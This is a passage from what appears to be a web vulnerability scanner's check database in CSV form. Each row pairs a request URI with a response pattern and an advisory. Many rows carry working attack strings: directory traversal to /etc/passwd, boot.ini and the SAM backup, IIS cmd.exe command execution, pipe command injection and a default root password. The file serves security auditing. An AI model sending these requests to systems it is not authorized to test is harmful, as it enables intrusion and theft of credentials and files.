should not be accessible via the web.\",\"\",\"\"\n\"000449\",\"39140\",\"3\",\"/test.php%20\",\"GET\",\"<\\?php\",\"\",\"\",\"\",\"\",\"The OmniHTTP install may allow php/shtml/pl script disclosure.  Upgrade to the latest version.\",\"\",\"\"\n\"000450\",\"0\",\"3\",\"/*.*\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"WASD Server reveals the contents of directories via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000451\",\"0\",\"3\",\"/cgi-bin/cgi_process\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WASD reveals a lot of system information in this script. It should be removed.\",\"\",\"\"\n\"000452\",\"0\",\"3\",\"/ht_root/wwwroot/-/local/httpd$map.conf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000453\",\"0\",\"3\",\"/JUNK(10)\",\"GET\",\"Document not found \\.\\.\\. \\/\",\"\",\"\",\"\",\"\",\"WASD reveals the web root in error requests. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000454\",\"0\",\"3\",\"/local/httpd$map.conf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000455\",\"0\",\"3\",\"/tree\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000456\",\"0\",\"3\",\"@CGIDIRSindex.js0x70\",\"GET\",\"\\\\<\\\\\\%\\\\=\",\"\",\"\",\"\",\"\",\"Weblogic can be tricked into revealing JSP source by adding '0x70' to end of the URL.\",\"\",\"\"\n\"000457\",\"576\",\"3\",\"/%00/\",\"GET\",\"<\\%\",\"\",\"\",\"\",\"\",\"Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.\",\"\",\"\"\n\"000458\",\"576\",\"3\",\"/%00/\",\"GET\",\"directory listing of\",\"\",\"\",\"\",\"\",\"Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.\",\"\",\"\"\n\"000459\",\"576\",\"3\",\"/%00/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513\",\"\",\"\"\n\"000460\",\"576\",\"3\",\"/%2e/\",\"GET\",\"<\\%\",\"\",\"\",\"\",\"\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513\",\"\",\"\"\n\"000461\",\"576\",\"3\",\"/%2e/\",\"GET\",\"directory listing of\",\"\",\"\",\"\",\"\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.\",\"\",\"\"\n\"000462\",\"576\",\"3\",\"/%2e/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.\",\"\",\"\"\n\"000463\",\"576\",\"3\",\"/%2f/\",\"GET\",\"<\\%\",\"\",\"\",\"\",\"\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513\",\"\",\"\"\n\"000464\",\"576\",\"3\",\"/%2f/\",\"GET\",\"directory listing of\",\"\",\"\",\"\",\"\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.\",\"\",\"\"\n\"000465\",\"576\",\"3\",\"/%2f/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.\",\"\",\"\"\n\"000466\",\"576\",\"3\",\"/%5c/\",\"GET\",\"<\\%\",\"\",\"\",\"\",\"\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513\",\"\",\"\"\n\"000467\",\"576\",\"3\",\"/%5c/\",\"GET\",\"directory listing of\",\"\",\"\",\"\",\"\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.\",\"\",\"\"\n\"000468\",\"576\",\"3\",\"/%5c/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.\",\"\",\"\"\n\"000469\",\"576\",\"3\",\"/index.jsp%00x\",\"GET\",\"<\\%=\",\"\",\"\",\"\",\"\",\"Bea WebLogic 6.1 SP 2 discloses source by appending %00x to a JSP request. Upgrade to a version newer than 6.2 SP 2 for Win2k. BID-2513\",\"\",\"\"\n\"000470\",\"3268\",\"2\",\"/weblogic\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"000471\",\"0\",\"3\",\"/%a%s%p%d\",\"GET\",\"\\*s\\?d\",\"\",\"\",\"\",\"\",\"Format bug is present & may reveal system path, upgrade to the latest version.\",\"\",\"\"\n\"000472\",\"0\",\"3\",\"/index.html%20\",\"GET\",\"File for URL\",\"\",\"\",\"\",\"\",\"Website may reveal file system paths by adding %20 to the end of a legitimate .html request.\",\"\",\"\"\n\"000480\",\"0\",\"3d\",\"@CGIDIRScgitest.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.\",\"\",\"\"\n\"000481\",\"0\",\"6\",\"/examples/servlet/AUX\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.\",\"\",\"\"\n\"000482\",\"6666\",\"6\",\"@CGIDIRShpnst.exe?c=p+i=SrvSystemInfo.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.\",\"\",\"\"\n\"000483\",\"0\",\"6\",\"/cfdocs/cfmlsyntaxcheck.cfm\",\"GET\",\"200\",\"\",\"not found\",\"\",\"\",\"Can be used for a DoS on the server by requesting it check all .exe's\",\"\",\"\"\n\"000484\",\"0\",\"6\",\"/Config1.htm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may be a D-Link. Some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info.\",\"\",\"\"\n\"000485\",\"0\",\"6\",\"/contents/extensions/asp/1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The IIS system may be vulnerable to a DOS, see MS02-018 for details.\",\"\",\"\"\n\"000486\",\"0\",\"6\",\"/WebAdmin.dll?View=Logon\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions of WebAdmin are vulnerable to a remote DoS (not tested). See http://www.ngssoftware.com.\",\"\",\"\"\n\"000487\",\"55370\",\"6\",\"@CGIDIRSPbcgi.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.\",\"\",\"\"\n\"000488\",\"55369\",\"6\",\"@CGIDIRStestcgi.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.\",\"\",\"\"\n\"000489\",\"0\",\"6\",\"/cgi-win/cgitest.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow the server to be crashed remotely, see http://www.securityoffice.net/ for details.  Remove this default CGI.\",\"\",\"\"\n\"000490\",\"0\",\"7\",\"/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The Web_Server_4D is vulnerable to a directory traversal problem.\",\"\",\"\"\n\"000491\",\"0\",\"8\",\"/c/winnt/system32/cmd.exe?/c+dir+/OG\",\"GET\",\"Directory of c\",\"\",\"\",\"\",\"\",\"This machine is infected with Code Red, or has Code Red leftovers.\",\"\",\"\"\n\"000492\",\"0\",\"8\",\"@CGIDIRSsnorkerz.bat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Arguments passed to DOS CGI without checking\",\"\",\"\"\n\"000493\",\"0\",\"8\",\"@CGIDIRSsnorkerz.cmd\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Arguments passed to DOS CGI without checking\",\"\",\"\"\n\"000494\",\"0\",\"8\",\"/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c\",\"GET\",\"\\[winnt\\]\",\"\",\"\",\"Internal server error\",\"\",\"Can issue arbitrary commands to host.\",\"\",\"\"\n\"000495\",\"0\",\"8\",\"/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c\",\"GET\",\"The paramater is incorrect\",\"\",\"\",\"Internal server error\",\"\",\"May be able to issue arbitrary commands to host.\",\"\",\"\"\n\"000496\",\"0\",\"8\",\"/msadc/samples/adctest.asp\",\"GET\",\"Remote Data Service\",\"\",\"\",\"\",\"\",\"The IIS sample application adctest.asp may be used to remotely execute commands on the server.  RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)\",\"\",\"\"\n\"000497\",\"0\",\"b\",\"/JUNK(10)\",\"GET\",\"SecureIIS application\",\"\",\"\",\"\",\"\",\"Server appears to be running eEye's SecureIIS application, http://www.eeye.com/.\",\"\",\"\"\n\"000498\",\"0\",\"b\",\"/somethingnotthere.ida\",\"GET\",\"Rejected-By-UrlScan\",\"\",\"\",\"\",\"\",\"The IIS server is running UrlScan\",\"\",\"\"\n\"000500\",\"0\",\"d\",\"@CGIDIRSwebfind.exe?keywords=01234567890123456789\",\"GET\",\"500\",\"\",\"\",\"\",\"\",\"May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater\",\"\",\"\"\n\"000501\",\"0\",\"d\",\"/cgi-shl/win-c-sample.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"win-c-sample.exe has a buffer overflow\",\"\",\"\"\n\"000502\",\"849\",\"34\",\"/examples/servlet/TroubleShooter\",\"GET\",\"TroubleShooter Servlet Output\",\"\",\"\",\"\",\"\",\"Tomcat default JSP page reveals system information and may be vulnerable to XSS.\",\"\",\"\"\n\"000503\",\"724\",\"8\",\"@CGIDIRSans.pl?p=../../../../../usr/bin/id|&blah\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"Avenger's News System allows commands to be issued remotely.\",\"\",\"\"\n\"000504\",\"724\",\"8\",\"@CGIDIRSans/ans.pl?p=../../../../../usr/bin/id|&blah\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"Avenger's News System allows commands to be issued remotely.\",\"\",\"\"\n\"000505\",\"0\",\"2\",\"/goform/CheckLogin?login=root&password=tslinux\",\"GET\",\"MainPageTable\",\"\",\"\",\"\",\"\",\"The Cyclades' web user 'root' still has the default password 'tslinux' set. This should be changed immediately. Also, the id/password is hashed to create the sessionId cookie, which is bad.\",\"\",\"\"\n\"000506\",\"57324\",\"5\",\"/[SecCheck]/..%2f../ext.ini\",\"GET\",\"\\[SERVICES\\]\",\"\",\"\",\"\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"000507\",\"57324\",\"5\",\"/[SecCheck]/..%255c..%255c../ext.ini\",\"GET\",\"\\[SERVICES\\]\",\"\",\"\",\"\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"000508\",\"57324\",\"5\",\"/[SecCheck]/..%252f..%252f../ext.ini\",\"GET\",\"\\[SERVICES\\]\",\"\",\"\",\"\",\"\",\"BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.\",\"\",\"\"\n\"000509\",\"1\",\"5\",\"/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\\winnt\\win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"The ColdFusion install allows attackers to read arbitrary files remotely\",\"\",\"\"\n\"000510\",\"1\",\"5\",\"/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\\windows\\win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"The ColdFusion install allows attackers to read arbitrary files remotely\",\"\",\"\"\n\"000511\",\"0\",\"5\",\"/.nsf/../winnt/win.ini\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This win.ini file can be downloaded.\",\"\",\"\"\n\"000512\",\"0\",\"5\",\"/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"This allows arbitrary files to be retrieved from the server. MS01-033.\",\"\",\"\"\n\"000513\",\"0\",\"5\",\"/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"This allows arbitrary files to be retrieved from the server. MS01-033.\",\"\",\"\"\n\"000514\",\"0\",\"5\",\"/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"This allows arbitrary files to be retrieved from the server. MS01-033.\",\"\",\"\"\n\"000515\",\"0\",\"5\",\"/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"This allows arbitrary files to be retrieved from the server. MS01-033.\",\"\",\"\"\n\"000516\",\"1210\",\"5\",\"/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.\",\"\",\"\"\n\"000517\",\"1210\",\"5\",\"/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.\",\"\",\"\"\n\"000518\",\"0\",\"5\",\"/................../config.sys\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PWS allows files to be read by prepending multiple '.' characters.  At worst, IIS, not PWS, should be used.\",\"\",\"\"\n\"000519\",\"0\",\"5\",\"/cfdocs/exampleapp/email/getfile.cfm?filename=c:\\boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Allows an attacker to view arbitrary files\",\"\",\"\"\n\"000520\",\"0\",\"5\",\"/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\\boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Allows an attacker to view arbitrary files\",\"\",\"\"\n\"000521\",\"0\",\"5\",\"/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\\boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Allows an attacker to view arbitrary files.\",\"\",\"\"\n\"000522\",\"5553\",\"5\",\"/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Sybex E-Trainer allows arbitrary files to be retrieved.\",\"\",\"\"\n\"000523\",\"5553\",\"5\",\"/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Sybex E-Trainer allows arbitrary files to be retrieved.\",\"\",\"\"\n\"000524\",\"0\",\"5\",\"/php/php.exe?c:\\winnt\\boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Apache/PHP installations can be misconfigured (according to documentation) to allow files to be retrieved remotely.\",\"\",\"\"\n\"000525\",\"53880\",\"5\",\"/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\\\\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"PHP Ping allows commands to be executed on the remote host.\",\"\",\"\"\n\"000526\",\"14484\",\"5\",\"/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"The boot.ini file was retrieved by using the db4web executable.\",\"\",\"\"\n\"000527\",\"0\",\"5\",\"/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\\boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Default scripts can allow arbitrary access to the host.\",\"\",\"\"\n\"000528\",\"59599\",\"5\",\"/wx/s.dll?d=/boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"WebCollection Plus allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000529\",\"0\",\"5\",\"@CGIDIRSAlbum?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0\",\"GET\",\"resolv\\.conf\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to view arbitrary files on the host.\",\"\",\"\"\n\"000530\",\"0\",\"5\",\"/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"The Web_Server_4D is vulnerable to a directory traversal problem.\",\"\",\"\"\n\"000531\",\"17110\",\"5\",\"/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00\",\"GET\",\"\\[boot loader\\]\",\"\",\"\",\"\",\"\",\"The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.\",\"\",\"\"\n\"000532\",\"10424\",\"5\",\"@CGIDIRSSQLServ/sqlbrowse.asp?filepath=c:\\&Opt=3\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.\",\"\",\"\"\n\"000533\",\"10420\",\"5\",\"@CGIDIRSstats/statsbrowse.asp?filepath=c:\\&Opt=3\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.\",\"\",\"\"\n\"000534\",\"0\",\"5\",\"@CGIDIRStest.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read files from the server.\",\"\",\"\"\n\"000535\",\"0\",\"5\",\"@CGIDIRStst.bat|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute arbitrary commands on the server.\",\"\",\"\"\n\"000536\",\"0\",\"5\",\"@CGIDIRSinput.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read files from the server.\",\"\",\"\"\n\"000537\",\"0\",\"5\",\"@CGIDIRSinput2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read files from the server.\",\"\",\"\"\n\"000538\",\"0\",\"5\",\"/ssi/envout.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read files from the server.\",\"\",\"\"\n\"000539\",\"0\",\"5\",\"/php/php.exe?c:\\boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"The Apache config allows php.exe to be called directly.\",\"\",\"\"\n\"000540\",\"0\",\"5\",\"/../../../../../../../../../boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"The remote server allows any system file to be retrieved remotely.\",\"\",\"\"\n\"000541\",\"0\",\"5\",\"/../../../../winnt/repair/sam._\",\"GET\",\"200\",\"\",\"\",\"Forbidden\",\"\",\"Sam backup successfully retrieved.\",\"\",\"\"\n\"000542\",\"0\",\"5\",\"/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"It is possible to read files on the server by adding /../ in front of file name.\",\"\",\"\"\n\"000543\",\"0\",\"5\",\"///etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The server install allows reading of any system file by adding an extra '/' to the URL.\",\"\",\"\"\n\"000544\",\"0\",\"5\",\"///etc/hosts\",\"GET\",\"127\\.0\\.0\\.1\",\"\",\"\",\"\",\"\",\"The server install allows reading of any system file by adding an extra '/' to the URL.\",\"\",\"\"\n\"000545\",\"0\",\"5\",\"////./../.../boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de. See http://www.it-checkpoint.net/advisory/14.html for details.\",\"\",\"\"\n\"000546\",\"1269\",\"5\",\"/.cobalt/sysManage/../admin/.htaccess\",\"GET\",\"AuthName\",\"\",\"\",\"\",\"\",\"Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory.\",\"\",\"\"\n\"000547\",\"50624\",\"5\",\"/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Coppermine 1.0 RC3 may have been compromised to allow arbitrary file retrieval. Upgrade to the latest at http://www.chezgreg.net/coppermine/\",\"\",\"\"\n\"000548\",\"9028\",\"5\",\"/autohtml.php?op=modload&mainfile=x&name=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"php-proxima 6.0 and below allows arbitrary files to be retrieved.\",\"\",\"\"\n\"000549\",\"49354\",\"5\",\"/atomicboard/index.php?location=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"AtomicBoard v0.6.2 allows remote users to read arbitrary files.\",\"\",\"\"\n\"000550\",\"54099\",\"5\",\"/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"w-agora 4.1.5 allows any file to be retrieved from the remote host.\",\"\",\"\"\n\"000551\",\"3012\",\"5\",\"/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"w-agora 4.1.5 allows any file to be retrieved from the remote host.\",\"\",\"\"\n\"000552\",\"54058\",\"5\",\"@TYPO3typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"TYPO3 allows any file to be retrieved remotely. Upgrade to the latest version.\",\"\",\"\"\n\"000553\",\"0\",\"5\",\"/DomainFiles/*//../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Communigate Pro 4.0b to 4.0.2 allow any file to be retrieved from the remote system.\",\"\",\"\"\n\"000554\",\"13302\",\"5\",\"/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\\boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Gafware's CFXImage allows remote users to view any file on the system.\",\"\",\"\"\n\"000555\",\"59600\",\"5\",\"/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"eZ httpbench version 1.1 allows any file on the remote server to be retrieved.\",\"\",\"\"\n\"000556\",\"2870\",\"5\",\"/index.php?download=/winnt/win.ini\",\"GET\",\"\\[fonts\\]\",\"\",\"\",\"\",\"\",\"Snif 1.2.4 allows any file to be retrieved from the web server.\",\"\",\"\"\n\"000557\",\"2870\",\"5\",\"/index.php?download=/windows/win.ini\",\"GET\",\"\\[windows\\]\",\"\",\"\",\"\",\"\",\"Snif 1.2.4 allows any file to be retrieved from the web server.\",\"\",\"\"\n\"000558\",\"2870\",\"5\",\"/index.php?download=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Snif 1.2.4 allows any file to be retrieved from the web server.\",\"\",\"\"\n\"000559\",\"59085\",\"5\",\"/index.php?|=../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.\",\"\",\"\"\n\"000560\",\"0\",\"5\",\"/index.php?page=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)\",\"\",\"\"\n\"000561\",\"0\",\"5\",\"/index.php?page=../../../../../../../../../../boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)\",\"\",\"\"\n\"000562\",\"59085\",\"5\",\"/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.\",\"\",\"\"\n\"000563\",\"0\",\"5\",\"/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Default JRun CGI lets users read any system file.\",\"\",\"\"\n\"000564\",\"0\",\"5\",\"/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"Default JRun CGI lets users read any system file.\",\"\",\"\"\n\"000565\",\"51750\",\"5\",\"/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Kebi Academy 2001 Web Solution allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000566\",\"0\",\"5\",\"/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"nCUBE Server Manage 1.0 allows any file to be read on the remote system.\",\"\",\"\"\n\"000567\",\"0\",\"5\",\"/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0\",\"GET\",\"passwd\",\"\",\"\",\"\",\"\",\"nCUBE Server Manage 1.0 allows directory listings of any location on the remote system.\",\"\",\"\"\n\"000568\",\"0\",\"5\",\"/phprocketaddin/?page=../../../../../../../../../../boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.\",\"\",\"\"\n\"000569\",\"2829\",\"5\",\"/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.\",\"\",\"\"\n\"000570\",\"2829\",\"5\",\"/phpwebfilemgr/index.php?f=../../../../../../../../../etc\",\"GET\",\"passwd\",\"\",\"\",\"\",\"\",\"phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.\",\"\",\"\"\n\"000571\",\"0\",\"5\",\"/phptonuke.php?filnavn=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Photonouke or myphpnuke allows arbitrary files to be retrieved from the remote host.\",\"\",\"\"\n\"000572\",\"0\",\"5\",\"/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"NCR's Terradata server contains a CGI that allows any file to be retrieved remotely.\",\"\",\"\"\n\"000573\",\"521\",\"5\",\"/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The ROADS search.pl allows attackers to retrieve system 